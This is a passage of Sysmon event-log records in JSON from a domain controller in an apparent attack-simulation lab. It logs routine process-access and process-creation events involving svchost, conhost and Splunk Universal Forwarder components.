07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4195,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4196,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4197,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4198,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4199,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4200,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2078-5F25-0000-0010BE320600}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2078-5F25-0000-0010BE320600}","TargetProcessId":"3008","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4201,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.826\r\nSourceProcessGUID: {41C8662E-2078-5F25-0000-0010BE320600}\r\nSourceProcessId: 3008\r\nSourceThreadId: 2704\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.826","SourceProcessGUID":"{41C8662E-2078-5F25-0000-0010BE320600}","SourceProcessId":"3008","SourceThreadId":"2704","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4202,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.764\r\nProcessGuid: {41C8662E-2079-5F25-0000-001003350600}\r\nProcessId: 3308\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.764","ProcessGuid":"{41C8662E-2079-5F25-0000-001003350600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4203,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2079-5F25-0000-001003350600}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed 